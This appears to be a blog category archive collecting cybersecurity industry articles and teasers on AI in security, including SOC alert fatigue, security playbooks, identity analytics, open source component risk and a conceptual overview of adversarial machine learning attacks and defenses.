Category Archives: artificial intelligence

Survey: 44% of Security Professionals Spend More than 20 Hours a Week Responding to Alerts

As the global cybersecurity climate continues to heat up, so too do the subsequent levels of alert fatigue IT security professionals have to deal with.

A recent survey by Imperva reveals that nine percent of UK security teams battle with over five million alerts each week. Five million, just let that sink in for a minute.

We spoke to 185 security professionals at Infosecurity Europe, revealing that nine percent of security professionals have to deal with over a million security alerts each day, leaving 22% feeling “stressed and frustrated.”

Fighting false positives

Our survey revealed that 63% of organizations often struggle to pinpoint which security incidents are critical, while 66% admitted they have ignored an alert due to a previous false-positive result.

Today’s security teams are on the receiving end of an avalanche of alerts and; while many of these alerts represent false positives, a large number also alert teams to critical events which, if ignored, could put an organization at serious risk. With IT security teams already spread thin, these alerts pile on additional pressure, which can become overwhelming.

Alert fatigue

The study also asked how many hours respondents spend every day dealing with security incidents; revealing that only 25% spend less than an hour, 31% spend between one and four hours, while 44% of security professionals admitted to spending over four hours every day dealing with security incidents.

Additionally, when respondents were asked what happens when the Security Operations Centre (SOC) has too many alerts for analysts to process, worryingly, nine percent said they turn off alert notifications altogether. 23% of Respondents said they ignore certain categories of alerts, 58% said they tune their policies to reduce alert volumes, and a lucky 10% said they hire more SOC engineers.

Not all businesses have the luxury to hire more staff when alert volume becomes too high, so Imperva has developed a solution which can help address this burden. Attack Analytics uses the power of artificial intelligence to automatically group, consolidate and analyze thousands of web application firewall (WAF) security alerts across different environments to identify the most critical security events. The solution combats security alert fatigue and allows security teams to easily identify the attacks that pose the highest risk.

Top strategic predictions for IT organizations and users in 2019 and beyond

Gartner revealed its top predictions for 2019 and beyond. Gartner’s top predictions examine three fundamental effects of continued digital innovation: artificial intelligence (AI) and skills, cultural advancement, and processes becoming products that result from increased digital capabilities and the emergence of continuous conceptual change in technology. “As the advance of technology concepts continues to outpace the ability of enterprises to keep up, organizations now face the possibility that so much change will increasingly seem chaotic. … More

The post Top strategic predictions for IT organizations and users in 2019 and beyond appeared first on Help Net Security.

Cybersecurity Future Trends: Why More Bots Means More Jobs

As the technological world hurls into the 2020s and cybersecurity future trends become reality, many experts expect the industry to evolve rapidly. Among the paradigm shifts still to come from digital innovation, data protection is bound to change and expand beyond the capabilities of today’s most common tools.

Above all, expect artificial intelligence (AI) to take a bigger role in cybersecurity as the IT industry seeks more efficient ways to shut down attacks immediately — or even before they happen.

Hiring AI Cybersecurity Guards

In the near future, new AI-powered solutions will look for anomalies in enterprise systems while matching patterns in threat actor behavior to predict when attacks are coming, said Shashi Kiran, chief marketing officer at Quali, a vendor of cloud automation services. Companies will also use AI tools to analyze user behavior and dig through system logs to spot problems, noted Laura Lee, executive vice president of rapid prototyping at cybersecurity training vendor Circadence. Lee said she expects AI-powered cybersecurity training to become more common as well.

In addition, AI systems will soon be able to analyze data from multiple sources, provide virtual assistants with special knowledge in cybersecurity and assist with penetration testing. In the coming decades, the “full scope of AI will be brought to bear in cybersecurity training environments to provide intelligent advisers, feedback and an AI adversary to practice against,” Lee added.

Planning for Obsolescence

Newer AI systems should provide capabilities that traditional antivirus products can’t. Many current security products focus largely on signature-based detection or analytics from patterns of suspicious activity, said Jason Rebholz, senior director of strategic partnerships at cybersecurity vendor Gigamon.

“With the emergence of AI, the basic decision-making can be offloaded to software,” he added. “While this isn’t a replacement for the analyst, it provides more time for them to perform more advanced decision-making and analysis, which is not easily replaced with AI.”

An AI-Driven Coding Evolution

Some security experts see big things for AI, with a sort of evolution built into its abilities.

“Imagine a world where cyberdefenses adapt and evolve with no human intervention,” said Kathie Miley, chief operating officer (COO) at Cybrary, another cybersecurity training company. “By putting AI into practice with evolutionary algorithms, software will also be able to assess current state, improve upon itself or kill off components no longer ideal for survival.”

Miley offered the example of a developer who accidentally creates a program with a structured query language (SQL) injection vulnerability: “AI will catch it and correct it with no human involvement, because it knows [the vulnerability is] dangerous to the application’s survival.”

Unfortunately, AI-trained systems won’t be exclusive to defenders. As Miley noted, threat actors “will be able to use AI to evolve their attacks without lifting a finger. It’s a race to who is stronger — the good guys or the bad guys.”

Why Cybersecurity Future Trends Won’t Exclude Humans

But even as AI takes a more central role in many organizations’ cybersecurity efforts, the need for qualified cybersecurity professionals will not diminish.

“Until AI evolves and wipes out humans, there will always be a place for people in the cybersecurity field,” Miley said. “Regulations, compliance, ethics and needs will need to be determined by us carbon life forms. However, tasks such as monitoring attacks and coding errors — and even coding itself — will certainly be automated at some point in the near future.”

Miley added that she sees a strong demand for security architects and governance, risk and compliance professionals in the coming years.

How AI Will Help Bridge the Skills Gap

New ways of automating some cybersecurity functions will help the industry bridge the cybersecurity skills gap that’s been growing since 2014. A recent Cybersecurity Ventures report forecast a shortage of 3.5 million open cybersecurity positions by 2021.

Bret Fund, founder and CEO of cybersecurity training academy SecureSet, argued that automated tools will require more refined skill sets.

“We will still have an education problem that will be exacerbated by the new skills required to interpret and analyze AI,” he predicted.

In addition, many small and medium-sized businesses will adopt AI tools more slowly than large enterprises will, meaning plenty of cybersecurity jobs will be available, Fund added.

Cybersecurity Workers: Seize the Day

Lee noted that demand is growing for cybersecurity workers with data science expertise as organizations look to maximize the value of the data they collect. She said she also foresees a shift in cybersecurity jobs that will “place soft skills and strategy at equal importance as required technical skills.”

Cybersecurity analysts, penetration testers and incident response professionals will be popular with job recruiters for several years, she added. However, those jobs may be changing, with more workers “expected to carry competencies in strategic thinking, creativity, problem-solving, working in teams and reporting alongside business objectives.”

Augmenting Automating With a Human Touch

According to Cesar Cerrudo, chief technology officer (CTO) of cybersecurity and penetration testing vendor IOActive Labs, paint-by-the-numbers cybersecurity jobs will soon be a thing of the past.

“Jobs that consist of repetitive tasks and tasks that don’t require creativity will disappear,” he said. “Having broad knowledge on past, latest and upcoming threats, along with broad vision in cybersecurity, will be required to achieve better results. You can’t properly secure a technology without anticipating what it will look tomorrow or in the next year.”

As technologies and their security measures carry us into 2020, forecasting threat trends will be the name of the game. Machine learning won’t replace the cybersecurity workforce any time soon, but get ready for a new face (or lack thereof) on your security operations center (SOC). Developing a broader skill set now and keeping an open mind will help you best prepare for the security industry of the future.

The post Cybersecurity Future Trends: Why More Bots Means More Jobs appeared first on Security Intelligence.

How to Avoid the Trap of Fragmented Security Analytics

The continuous evolution of attack tactics and poor threat visibility keeps cyber defenders on their toes, especially when adversaries exploit the human mind with tactics such as phishing and using individually crafted, short-lived weaponizations. As a result, more and more security organizations are prioritizing the use of security analytics to quickly and accurately identify attacks and act before major damage is done.

Why a Fragmented Approach Doesn’t Work

This movement into security analytics is not without its hitches, especially when organizations acquire a fragmented set of analytics tools. At first glance, it seems logical to have separate analytics for networks, endpoints, users, cloud and applications. Highly specialized tools can produce some promising new insights in a small amount of time.

However, when each of these tools is producing high-volume data and individual alerts, analysts must constantly switch between different screens. The result is often a substantial increase in operational cost and time to investigate, scope and decide on remediation steps.

Part of this problem can be tactically reduced by using automation and orchestration, but the real problem arises when the organization is looking to increase the quality and depth of detection by using behavioral analytics or machine leaning, which require a broad, mixed amount of data and substantial training time. While fragmented tools may be good at producing an individual alert, sharing all the underlying data often remains proprietary to the individual tool, preventing organizations from moving to advanced machine learning-based detection. A third problem is the overhead in data management and administration of all these individual tools.

Embrace a Platform-Based Approach to Security Analytics

To avoid this trap, security teams should consider a platform-based approach whereby data ingestion, correlation, management and a broad set of analytics can be tied together. Solid correlation within the entire data stream offers great perspective for moving into more mature detection.

For instance, let’s say an organization wants to increase visibility into service accounts — i.e., accounts used by administrators to configure an application or tool — which are often targeted by adversaries to steal the business’ crown jewels. Not only is the service account login information required, but also other information to identify the real original user, such as where they accessed the account from, what time they accessed it, what other tools they were using and other actions they executed.

This combination requires a lot of correlations, both at the data intake level — adding system name and user name to network data — and downstream at the detection process, such as connecting and measuring individual anomaly events into a risk metric (i.e., combining abnormal process started with abnormal network traffic and user activity outside peer group activity). This level of advanced correlation is almost impossible using fragmented tools because it requires a common reference set of all users, assets, networks and system names — which, in today’s enterprise environment, doesn’t exist or is below satisfaction.

Security analytics offers many benefits to detect, investigate and respond to threats. However, to move toward deep, advanced analytics using artificial intelligence (AI) and machine learning, fragmented tools should be replaced with a platform-based approach that can leverage a broad set of data.

Watch the webinar to learn more

The post How to Avoid the Trap of Fragmented Security Analytics appeared first on Security Intelligence.

Does Your SOC Have a Security Playbook?

As the top coaches of any professional sports team would confirm, the best playbook is about much more than just the plays. In the same way that coaches use whiteboards and adhesive notes to draw diagrams in their playbooks, many security operations centers (SOCs) have printed binders of actions to take when data breaches occur. Some analysts print out events and tape them to walls to put a series of events in order.

According to Steve Moore, chief security strategist at Exabeam, a security playbook is designed to help analysts answer the following fundamental questions: How big is the problem, and who was involved?

“The core of answering the question is understanding the state of every IP address, every host and every account used 24 hours a day,” he explained. “This is the real hidden framework that enables a valuable response playbook.”

Short of having these full analysis timelines, a complete response isn’t possible. But with the right help, careful planning, and regularly rehearsed and tested processes, SOC analysts can respond to incidents with confidence and consistently keep their enterprise networks safe from compromise.

Why Your SOC Needs a Security Playbook

Players on the field understand that the game is a constant cycle of defending, attacking and transitioning. No one knows what threatens the enterprise more than the frontline defenders, which is why playbooks are built by analysts. An SOC with a playbook has the advantage of being able to focus only on the alerts that matter.

“By utilizing a playbook, it is guaranteed that the analysts will make the determination regarding the initial validity of the alert in front of them as quickly as possible, allowing the SOC to handle a lot more incoming alerts and focus on actual incidents or threats to the organization,” said Meny Har, vice president of product at Siemplify.

Without playbooks, analysts tend to revert to their gut — which might be effective for the individual, but it leaves the entire team at the mercy of the knowledge that exists within that analyst’s mind. SOCs that suffer from high turnover rates risk not only the loss of analysts, but also the loss of their undocumented expertise. In addition, Moore said that without a playbook, “your work product will vary in effort and quality, and new associates will take longer to acclimate without a playbook.”

New hires within an SOC could take nine months to get up to speed, but using the right technology and process can potentially reduce the learning curve.

Be Flexible and Adaptive

That the offense will change its tactics unexpectedly is a given, so the playbook should be flexible to create a constantly improving process. Built-in adaptability as a guiding concept will remind the team that agility has great value when it comes to security.

“By utilizing clear, auditable playbooks, SOCs can gain very meaningful insights into their own process, creating effective feedback loops as well as measurements and metrics,” Har explained. “This allows the SOC to identify bottlenecks where configuration changes (or automation) can take place and where the analysts can make even better decisions.”

The SOC team also relies on the contextual data included in the playbooks to determine whether to escalate or collaborate with further resources. While adaptability is important, playbooks should include the types of threats that have been seen in previous occurrences. They should detail whether an alert was deemed a false positive, who worked on the threat, what was previously done and what actions proved effective. Including all this information in the playbook puts analysts in a better position to make the best possible decisions so they can quickly respond to security incidents.

Balance Automation and Human Decision-Making

For more advanced SOCs, the playbook will strike a balance between leveraging automation and providing analysts with the knowledge they need to make their own decisions when necessary. Automating intelligence helps the SOC team identify not only whether an alert is malicious, but also how it is malicious, which provides some guidance on the best way to remove or handle the threat. In addition, automating contextual data helps identify whether a specific alert pertains to a high-value part of the network or a marginal one.

Let’s say an endpoint is infected and a set of credentials is stolen — what has to happen? The first step is to reference a timeline to determine whether the account was signed in to a second system that it’s never accessed before.

“The analyst could further submit that malware for automated analysis,” Moore said. “The action could involve blocking associated IP addresses, disabling the account, taking the machine offline, and sending an email to the associate’s manager and the privacy office.

“Think of automation, in its simplest terms: as a virtual helper for often-repeated and time-consuming tasks,” Moore continued. “The best type of security automation is one that vacuums up all the little unrelated events that occur inside your network and orders them into a timeline, ties them to that to a human or device, makes it quickly referenceable by risk, and illustrates which discrete events are normal or abnormal.”

Balancing automation with playbooks allows analysts to quickly understand additional risks so they can take immediate action to remove and adversary from a network or endpoint.

Measure and Improve Your Process

In writing playbooks, security leaders outline the right processes and procedures for SOC analysts to deal with the alerts they have actually seen. They should also describe the processes the SOC will need carry out to optimally handle any alerts and threats they may someday face. The team should constantly evaluate whether there was a situation it encountered for which the playbook didn’t account.

“This typically takes forms in the shape of ‘improvement’ steps within individual workflows — a place where analysts can note and update on their individual experiences,” Har explained.

If it so happens that an incident is inappropriately escalated, the process managers of the SOC can then go into an iterative process to evaluate what might have been a more valuable use of time for future reference. The playbook authors should take a higher-level view of the threat landscape of the organization while also looking at any new intelligence that may need special handling. For this reason, playbooks may not all be rolled out at the same time.

“This is where new playbooks are introduced to alerts which previously had none defined,” Har said. “This is also where high-level KPIs and metrics the SOC have collected are used as feedback. Where are my analysts spending the most time? Can certain steps be removed, adapted or alternatively automated?”

The idea is to also increase efficiency and time allocation of the resources in the SOC over time, which is usually done at a cadence determined by a higher-level employee in the SOC, be it the manager, director or sometimes even more senior personnel.

Read the Offense

Playbooks are designed to help SOC teams respond to known threats because security breaches are not typically the result of unknown threats. Security breaches most often occur because of unpatched vulnerabilities or other lax security practices, such as failure to perform risk analysis or basic network segmentation, misconfiguration, lack of security tools, and failure to make time for analysts to actually review detected threats.

“For a security team, an unknown threat is not necessarily a new threat or vulnerability that has never been seen before, but any threat that has not been detected by the organization’s own sensors and teams,” Har said.

That said, playbooks can quickly and effectively eliminate any background noise. When relevant threats are identified, they need to be addressed quickly through collaboration between relevant parties and rapid execution of the incident response plan.

Although no playbook is perfect, threat actors are far less likely to bypass a defense with well-defined and tested strategies. For the SOC team, strong defense comes from the ability to properly allocate precious resources, one of which is time.

When senior analysts are able to spend time looking beyond a reactive approach to threat response, they can shift to more proactive threat detection. From the threat hunting process, they can even develop additional threat intelligence-based playbooks to better position the team against unknown threats that the SOC would likely not have known about.

Discover Resilient dynamic playbooks

The post Does Your SOC Have a Security Playbook? appeared first on Security Intelligence.

New tools from IBM and Google reveal it’s hard to build trust in AI

The unseen dangers inherent in artificial intelligence (AI) are proving the importance of IBM and Google’s diverse approach to this multifaceted problem. Brad Shimmin and Luciano C. Oviedo offer their perspective on this important issue. Brad Shimmin, Service Director at GlobalData Artificial Intelligence (AI) has already changed the way consumers interact with technology and the way businesses think about big challenges like digital transformation. In fact, GlobalData research shows that approximately 50% of IT buyers … More

The post New tools from IBM and Google reveal it’s hard to build trust in AI appeared first on Help Net Security.

Cybersecurity Research Shows Risks Continue to Rise

Research is at the center of the cybersecurity industry, with a steady stream of reports that highlight weaknesses in cyber defenses and potential solutions. Last week was a particularly busy

The post Cybersecurity Research Shows Risks Continue to Rise appeared first on The Cyber Security Place.

Maximize the Power of Your Open Source Application Security Testing

Open source components are the building blocks of the application economy. According to recent research, open source components make up 60 to 80 percent of the code base in modern applications.

Developers depend on components that are written and maintained by the open source community to work faster and more efficiently, and to keep up with rapid demand for new versions and updates.

What’s Driving the Rise of Open Source?

According to a WhiteSource survey titled “The State of Open Source Vulnerabilities Management,” 96.8 percent of developers reported that they use open source components “all the time,” “very often” or “sometimes.” Only 3.2 percent of developers reported that they did not use open source at all, likely due to policies that do not allow them to do so in their organizations. Interestingly enough, developers who use open source components rely on them significantly, which can explain why none of the respondents described their usage as “rarely.”

Frequency of Open Source Use

However, despite the technology industry’s dependence on these components, there is an unfortunate lack of understanding regarding how to properly manage risk when utilizing them. To get a real handle on how to uphold best practices when it comes to using open source components securely, organizations must first realize how much of this code they are using.

Why It’s Important to Track Your Open Source Components

Open source components face risks from threat actors who can exploit vulnerabilities in popular open source projects to potentially target thousands of organizations, many of which are unaware they are even using these vulnerable components in their products.

Tracking inventories and managing security — especially if there is no practice in place for directing how open source components should be handled — is no small feat. Companies looking to harness the power of open source components in their products have a responsibility to use them securely.

In far too many organizations, developers don’t effectively track which open source components they are using in their code. In other cases, they are expected to make manual records in spreadsheets or notify colleagues via email about the components they use. Neither option is truly viable at scale, nor do they satisfy the security need to identify components with known vulnerabilities.

What Are the Potential Risks of Using Open Source Components?

As opposed to proprietary code that is written in-house — where the main concern is that an attacker might uncover a previously unknown vulnerability — open source faces different risks.

When a vulnerability is discovered by a security researcher in the open source community, it is reported to one of the many databases and security advisory organizations, such as the National Vulnerability Database (NVD). Vulnerability disclosures help inform organizations that they could be using flawed components.

Potential attackers monitor these databases and use them to target organizations that are deploying vulnerable components, hoping to prey on victims that are too slow to remediate the flaws right away. Therefore, the challenge for organizations is to stay on top of which open source components they are using and know which ones are vulnerable to exploitation. To put it simply, you can’t patch what you don’t know.

Another challenge is that it’s virtually impossible to manage a continuous inventory of open source components used in your products and match them to newly discovered vulnerabilities through manual tracking. It is certainly not scalable for any organization that has teams of developers, which is commonplace today.

It’s also extremely difficult to collect all the open source vulnerability information that originates from the NVD and other resources. We’ll review this topic in a future post.

Take Control of Open Source Application Security Testing

Getting a handle on the vulnerability status of your open source components is the first step toward improving the security of your applications. When managed correctly, open source code is a valuable asset in the hands of developers.

However, with great power comes great responsibility. For leadership, this means making sure your team has the tools it needs to effortlessly maintain a proper inventory of open source components — and using this information to create actionable steps to keep your products secure.

Discover IBM Application Security on Cloud

The post Maximize the Power of Your Open Source Application Security Testing appeared first on Security Intelligence.

Cyber security in the energy sector: Rolling out a strategy in the face of disruption – Part 3

This is the final article in a three part series looking at cyber security in the energy sector. Here, Information Age looks at how energy companies can best roll out

The post Cyber security in the energy sector: Rolling out a strategy in the face of disruption – Part 3 appeared first on The Cyber Security Place.

How Analytics Can Help You Better Understand Access Risks

Cloud, the Internet of Things (IoT), mobile and digital business initiatives have broadened the surface and increased the complexity of identity and access management (IAM) environments. With millions of entitlements to manage across thousands of users and hundreds of applications, organizations are struggling to keep their access risks in check.

Today’s environments have become so complex that no reasonable IAM professional — no matter how talented — could feasibly gather, analyze and detect every relevant access-related risk factor. This lack of insight is leading to security risks, operational inefficiencies, loss of data and failure to comply with regulatory standards.

A modern approach to identity demands not only strong access controls and governance, but also a high level of risk awareness. Old-school, rules-based approaches to policy management for access controls, identity management and data governance can’t effectively pinpoint the new types of suspicious and harmful activities that are occurring in large and complex environments. Instead, organizations must consider an analytics-based approach that simplifies the demands placed on IAM professionals.

The Identity Analytics Imperative

A typical IAM system contains basic information about who users are and what they can access. However, this data isn’t sufficient to provide an accurate picture of access-related risks. To get a holistic view of access risks, you must obtain information about what users are really doing with their access privileges.

This means incorporating data from a vast array of other sources, such as data access governance, content-aware data loss prevention, security intelligence and event monitoring (SIEM), and database monitoring systems, as well as application, web, network, database and endpoint logs. By gathering data from various sources, advanced analytics techniques can create a holistic view of the managed environment and provide a 360-degree view of access risks. This is known as identity analytics, a process that employs big data, machine learning and artificial intelligence (AI) technologies to consume and analyze vast amounts of data and distill that data into actionable intelligence, allowing organizations to detect and respond to access risk more quickly.

Using Baselines to Understand the Abnormal

Identity analytics enable administrators to be more proactive instead of reactive with continuous monitoring of the identity environment. It builds behavioral baselines of normal user activity and then detects anomalies from those baselines.

Typical user activities, such as requesting access to applications, logging into applications and accessing data in file sharing systems, are normal in isolation but would raise a flag when done at an unusually high volume or frequency. With an understanding of baseline and abnormal behavior, organizations can achieve better compliance with meaningful and actionable insights about user activity at each stage of the user access life cycle.

The diagram below illustrates the stages users go through when joining a business workforce and obtaining access to the tools and assets necessary to do their job. The IAM life cycle also includes stages to ensure that employees maintain appropriate access as they move within the organization, with access being revoked or changed when they separate or change roles.

In each phase, identity analytics data increases risk awareness and responsiveness, provides richer contextual user experiences and informs behavioral-based access policies. It bridges the gap between administrative controls and runtime activities, enabling administrators to get a clearer picture of how users are actually utilizing their access. With identity analytics, IAM teams can detect suspicious user activity, remediate inappropriate access and adjust access policies as necessary.

The lifecycle of user access, from request to recertification

Identity analytics leverage machine learning and application usage data to make access policies and role recommendations that are based on user behavior and data usage — not merely on assigned entitlements or entitlement histories. These recommendations can provide IAM teams with a more accurate snapshot of policy and minimize the proliferation of unnecessary entitlements.

The Added Value of Artificial Intelligence

AI technology can make identity analytics an even more robust tool. With AI, identity analytics can automatically predict trends and behaviors, identify what may potentially happen and make recommendations for corrective action. It is a self-learning system that uses data mining and machine learning techniques to generate not just answers, but hypotheses, evidence-based reasoning and recommendations for improved decision-making in real time.

Cognitive systems use analysis methods such as machine learning, clustering, graph mining and entity relationship modeling to identify potential threats. For example, cognitive identity analytics systems can learn personality traits from users’ messages, blogs, emails and social data, and then use those traits to predict whether certain users could be potential insider threats. This analysis, combined with users’ activity and access patterns, can help raise the alarm for system admins and then suggest possible actions they could take to address the concern.

Identity analytics makes IAM smarter by enhancing existing processes with a rich set of user activity and event data, peer group analysis, anomaly detection, and real-time monitoring and alerting. The net result is improved compliance and reduced risk.

Using identity analytics can help your organization embrace the future of IAM — a future that’s smarter, more effective and more secure.

Read the Forrester report

Are you interested in expanding your identity and access management (IAM) solutions to include identity analytics? Cloud Identity Analyze is IBM’s newest addition to the Cloud Identity family. Cloud Identity provides cloud-based IAM capabilities from federated single sign-on (SSO) to multifactor authentication (MFA), identity provisioning, governance and more.

Cloud Identity Analyze is currently in beta and open to existing Identity Governance and Intelligence (IGI) and IBM Security Identity Manager (ISIM) customers to trial.

The post How Analytics Can Help You Better Understand Access Risks appeared first on Security Intelligence.

How Can Companies Defend Against Adversarial Machine Learning Attacks in the Age of AI?

The use of AI and machine learning in cybersecurity is on the rise. These technologies can deliver advanced insights that security teams can use to identify threats accurately and in a timely fashion. But these very same systems can sometimes be manipulated by rogue actors using adversarial machine learning to provide inaccurate results, eroding their ability to protect your information assets.

While it’s true that AI can strengthen your security posture, machine learning algorithms are not without blind spots that could be attacked. Just as you would scan your assets for vulnerabilities and apply patches to fix them, you need to constantly monitor your machine learning algorithms and the data that gets fed into them for issues. Otherwise, adversarial data could be used to trick your machine learning tools into allowing malicious actors into your systems.

Most research in the adversarial domain has been focused on image recognition; researchers have been able to create images that fool AI programs but that are recognizable to humans. In the world of cybersecurity, cybercriminals can apply similar principles to malware, network attacks, spam and phishing emails, and other threats.

How Does Adversarial Machine Learning Work?

When building a machine learning algorithm, the aim is to create a perfect model from a sample set. However, the model uses the information in that set to make generalizations about all other samples. This makes the model imperfect and leaves it with blind spots for an adversary to exploit.

Adversarial machine learning is a technique that takes advantage of these blind spots. The attacker provides samples to a trained learning model that cause the model to misidentify the input as belonging to a different class than what it truly belongs to.

What Does the Adversary Know?

The sophistication of an attack and the effort required from the adversaries depends on how much information attackers have about your machine learning system. In a whitebox model, they have information about inputs, outputs and classification algorithms. In a graybox model, the attackers only know the scores that your model produces against inputs. A blackbox model is the hardest to exploit because the attackers only know classifications such as zero/one or malicious/benign.

Figure 1

Types of Adversarial Machine Learning Attacks

There are two primary types of adversarial machine learning attacks: poisoning attacks and evasion attacks. Let’s take a closer look at the similarities and differences between the two.

Poisoning Attacks

This type of attack is more prevalent in online learning models — models that learn as new data comes in, as opposed to those that learn offline from already collected data. In this type of attack, the attacker provides input samples that shift the decision boundary in his or her favor.

For example, consider the following diagram showing a simple model consisting of two parameters, X and Y, that predict if an input sample is malicious or benign. The first figure shows that the model has learned a clear decision boundary between benign (blue) and malicious (red) samples, as indicated by a solid line separating the red and blue samples. The second figure shows that an adversary input some samples that gradually shifted the boundary, as indicated by the dotted lines. This results in the classification of some malicious samples as benign.

Figure 2

Evasion Attacks

In this type of attack, an attacker causes the model to misclassify a sample. Consider a simple machine learning-based intrusion detection system (IDS), as shown in the following figure. This IDS decides if a given sample is an intrusion or normal traffic based on parameters A, B and C. Weights of the parameters (depicted as adjustable via a slider button) determine whether traffic is normal or an intrusion.

Figure 3

If this is a whitebox system, an adversary could probe it to carefully determine the parameter that would classify the traffic as normal and then increase that parameter’s weight. The concept is illustrated in the following figure. The attacker recognized that parameter B plays a role in classifying an intrusion as normal and increased the weight of parameter B to achieve his or her goal.

Figure 4

How to Defend Against Attacks on Machine Learning Systems

There are different approaches for preventing each type of attack. The following best practices can help security teams defend against poisoning attacks:

  • Ensure that you can trust any third parties or vendors involved in training your model or providing samples for training it.
  • If training is done internally, devise a mechanism for inspecting the training data for any contamination.
  • Try to avoid real-time training and instead train offline. This not only gives you the opportunity to vet the data, but also discourages attackers, since it cuts off the immediate feedback they could otherwise use to improve their attacks.
  • Keep a ground truth test and test your model against this set after every training cycle. Considerable changes in classifications from the original set will indicate poisoning.

Defending against evasive attacks is very hard because trained models are imperfect, and an attacker can always find and tune the parameters that will tilt the classifier in the desired direction. Researchers have proposed two defenses for evasive attacks:

  1. Try to train your model with all the possible adversarial examples an attacker could come up with.
  2. Compress the model so it has a very smooth decision surface, resulting in less room for an attacker to manipulate it.

Another effective measure is to use cleverhans, a Python library that benchmarks machine learning systems’ vulnerabilities to adversarial samples. This can help organizations identify the attack surface that their machine learning models are exposing.

According to a Carbon Black report, 70 percent of security practitioners and researchers said they believe attackers are able to bypass machine learning-driven security. To make machine learning-based systems as foolproof as possible, organizations should adopt the security best practices highlighted above.

The truth is that any system can be bypassed, be it machine learning-based or traditional, if proper security measures are not implemented. Organizations have managed to keep their traditional security systems safe against most determined attackers with proper security hygiene. The same focus and concentration is required for machine learning systems. By applying that focus, you’ll be able to reap the benefits of AI and dispel any perceived mistrust toward those systems.

The post How Can Companies Defend Against Adversarial Machine Learning Attacks in the Age of AI? appeared first on Security Intelligence.

Spending on cognitive and AI systems to reach $77.6 billion in 2022

Global spending on cognitive and artificial intelligence (AI) systems is forecast to continue its trajectory of robust growth as businesses invest in projects that utilize cognitive/AI software capabilities. Spending on the rise According to a new update to the IDC Worldwide Semiannual Cognitive Artificial Intelligence Systems Spending Guide, spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. The compound annual growth rate … More

The post Spending on cognitive and AI systems to reach $77.6 billion in 2022 appeared first on Help Net Security.

Better security needed to harness the positive potential of AI, mitigate risks of attacks

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI, mitigate risks of attacks appeared first on Help Net Security.

Key weapon for closing IoT-era cybersecurity gaps? Artificial intelligence

As businesses struggle to combat increasingly sophisticated cybersecurity attacks, the severity of which is exacerbated by both the vanishing IT perimeters in today’s mobile and IoT era, and an acute shortage of skilled

The post Key weapon for closing IoT-era cybersecurity gaps? Artificial intelligence appeared first on The Cyber Security Place.

The Road to Freedom: How a Strong Security Culture Can Enable Digital Transformation

“The only real prison is fear, and the only real freedom is freedom from fear.” – Aung San Suu Kyi

The “new oil” — that’s how data is being referred to these days. Organizations all over the world are redefining their business models, reinventing themselves, rethinking their security culture and building around experiences. Users and their data are at the center of these experiences, so it is only natural that data breaches and security incidents have recently taken on a new dimension.

With an average cost of $3.86 million per breach and a whopping $39.49 million for megabreaches, organizations are rightfully frightened. But where fear paralyzes, prevention, timely detection and risk management can be liberating. Cybersecurity, if regarded as a strategic business enabler rather than an obstacle, can become the path to a smoother, freer digital transformation. The main challenge here lies in an organization’s ability to innovate.

Artificial Intelligence Can Help

The NHS Institute defines innovation as “doing things differently and doing different things” as a means for opening up to greater opportunities. While this mindset is critical for digital reinvention, cybersecurity can benefit from it too. Organizations have slowly yet rather successfully gone from a siloed and perimeter-based security culture to adopting integrated and intelligence-based strategies. But today’s threat and regulatory landscapes require an even higher level of cyber resiliency. Innovation is an effective path to achieving this, but an organization must be bold enough to do things differently and in a way that addresses technology, processes and people as a whole.

Applying artificial intelligence (AI) to cybersecurity is a great example of innovation. This technology is disrupting the way organizations aggregate large volumes of data, identify and contain vulnerabilities, protect against cyberattacks, and even establish digital trust.

AI allows security leaders to augment the work of analysts significantly. The Ponemon Institute’s “Artificial Intelligence in Cyber-Security” report found that out of 603 respondents, 60 percent believe that AI-based technologies can provide deeper security than a human alone could. The same 60 percent also agreed that AI increases productivity. The math on this speaks for itself. The study revealed that security teams that don’t use AI spend 400 hours per week chasing false positives. The average time using AI is only 41 hours per week. Lastly, 40 percent of respondents said that previously undetectable zero-day exploits could be detected with the help of AI.

Download the complete Ponemon Institute study: Artificial Intelligence in Cyber-Security

Cost Reduction Is Key, But Productivity Wins the Game

With AI also helping reduce identification, contention and analysis times, it makes sense that 61 percent of organizations plan to increase their investment in AI in the next year. It seems like a wise investment when you consider that an organization can reduce the average cost per record of a data breach — $148 — by $8 just by implementing AI technologies. The Ponemon report noted that with AI, a company can potentially save an average of more than $2.5 million in operating costs per year.

Most importantly, disruptive technologies such as artificial intelligence can free security teams to better focus their energy. Ponemon’s “Cost of a Data Breach” study put the mean time to identify a data breach at 197 days, with a 67-day average to contain it. Security teams spend more than half a year identifying breaches and more than 20,000 hours chasing false positives. Caught in this vortex of cybercrime and compliance, businesses are locked in a “golden cage.” A proactive strategy with an AI-involved approach leads to businesses being more aware of what happened, what can happen and, above all, what should be done.

Innovate to Improve Security Culture

Getting the security basics right, integrating artificial intelligence and aligning technology with processes for better productivity are critical cybersecurity mandates. Preparedness and accountability also play a role in mitigating risks and removing fear from the equation. But bringing innovation successfully into the organization also means changing how people think and talk about security. A lack of awareness and growing myths around security have led organizations to face an imminent challenge: the skills gap.

It is estimated that by 2020, there will be 1.5 million unfilled cybersecurity jobs. This means that students and professionals are either not engaging with security in meaningful ways or encountering entry barriers too large to surpass. At IBM, we have helped address the skills gap by innovating in several domains, including:

  • Collaboration — working with our customers to leverage the research and expertise of our X-Force team to train and test their security programs;

  • Engaging in design thinking practices to help organizations achieve a holistic view of cybersecurity and apply it to their operations;

  • Working with universities on their security curriculum; and

  • Embracing a new collar approach.

A security culture that permeates all areas and levels within the organization is critical to ensuring the success of an integrated and intelligent security strategy. After all, it is the people inside the organization who hold the key to any type of transformation.

Regain Your Freedom

IBM Security’s mission statement reads: “We exist to protect the world, freeing you to thrive in the face of cyber uncertainty.” Businesses exist to do business, not engage in cyber warfare. Organizations must consider approaching cybersecurity as a process, not a product. This shift in mindset and daring to innovate can enable their business to not only keep fraudsters out, but also transform freely and, ultimately, succeed.

Download the complete Ponemon Institute study: Artificial Intelligence in Cyber-Security

The post The Road to Freedom: How a Strong Security Culture Can Enable Digital Transformation appeared first on Security Intelligence.

